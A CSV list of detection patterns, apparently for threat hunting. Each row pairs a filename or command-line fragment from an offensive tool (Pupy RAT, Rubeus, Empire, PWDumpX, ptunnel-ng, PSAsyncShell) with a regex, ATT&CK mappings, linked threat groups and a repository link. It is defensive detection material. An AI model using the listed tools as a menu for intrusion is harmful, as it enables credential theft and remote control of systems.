"* PSAsyncShell.ps1*",".{0,1000}\sPSAsyncShell\.ps1.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","2689"
"* PSAsyncShell.sh*",".{0,1000}\sPSAsyncShell\.sh.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","2690"
"* psexec_merged.bin*",".{0,1000}\spsexec_merged\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","2691"
"* psexecsvc.py*",".{0,1000}\spsexecsvc\.py.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","N/A","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","2692"
"* psgetsys.ps1*",".{0,1000}\spsgetsys\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","2693"
"* psgetsys.ps1*",".{0,1000}\spsgetsys\.ps1.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","2694"
"* PSLessExec.exe*",".{0,1000}\sPSLessExec\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","2695"
"* PSnmap.ps1*",".{0,1000}\sPSnmap\.ps1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","2696"
"* PSObfucate.py*",".{0,1000}\sPSObfucate\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","2697"
"* ptt /ticket:*",".{0,1000}\sptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2698"
"* ptunnel-ng*",".{0,1000}\sptunnel\-ng.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","2699"
"* --publickey * --ecmdigits 25 --verbose --private*",".{0,1000}\s\-\-publickey\s.{0,1000}\s\-\-ecmdigits\s25\s\-\-verbose\s\-\-private.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2700"
"* --publickey * --uncipherfile ./ciphered\_file*",".{0,1000}\s\-\-publickey\s.{0,1000}\s\-\-uncipherfile\s\.\/ciphered\\_file.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2701"
"* puppet-naivesigning.nse*",".{0,1000}\spuppet\-naivesigning\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2705"
"* PupyCredentials*",".{0,1000}\sPupyCredentials.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2706"
"* pupylib.*",".{0,1000}\spupylib\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2707"
"* pupysh.py*",".{0,1000}\spupysh\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2708"
"* pupysh.sh*",".{0,1000}\spupysh\.sh.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2709"
"* PupySocketStream*",".{0,1000}\sPupySocketStream.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2710"
"* PupyTCPClient*",".{0,1000}\sPupyTCPClient.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2711"
"* PupyTCPServer*",".{0,1000}\sPupyTCPServer.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2712"
"* PupyWebServer*",".{0,1000}\sPupyWebServer.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2713"
"* PupyWebSocketClient*",".{0,1000}\sPupyWebSocketClient.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2714"
"* PupyWebSocketServer*",".{0,1000}\sPupyWebSocketServer.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2715"
"* pupyx64.dll*",".{0,1000}\spupyx64\.dll.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2716"
"* pupyx64.exe*",".{0,1000}\spupyx64\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2717"
"* pupyx64.lin*",".{0,1000}\spupyx64\.lin.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2718"
"* pupyx86.dll*",".{0,1000}\spupyx86\.dll.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2719"
"* pupyx86.exe*",".{0,1000}\spupyx86\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2720"
"* push_payload*",".{0,1000}\spush_payload.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2721"
"* putterpanda.py*",".{0,1000}\sputterpanda\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","2722"
"* pwcrack.sh*",".{0,1000}\spwcrack\.sh.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","0","N/A","N/A","10","6","547","125","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z","2723"
"* pwcrack-framework*",".{0,1000}\spwcrack\-framework.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","2724"
"* pwdump.py*",".{0,1000}\spwdump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","2725"
"* pwdump.py*",".{0,1000}\spwdump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2726"
"* -PWDumpFormat *",".{0,1000}\s\-PWDumpFormat\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","2727"
"* PWDumpX process *",".{0,1000}\sPWDumpX\sprocess\s.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","2728"
"* PWDumpX service *",".{0,1000}\sPWDumpX\sservice\s.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","2729"
"* pwn_php.me*",".{0,1000}\spwn_php\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","2730"
"* pwn_python.me*",".{0,1000}\spwn_python\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","2731"
"* Pwn3d!*",".{0,1000}\sPwn3d!.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2733"
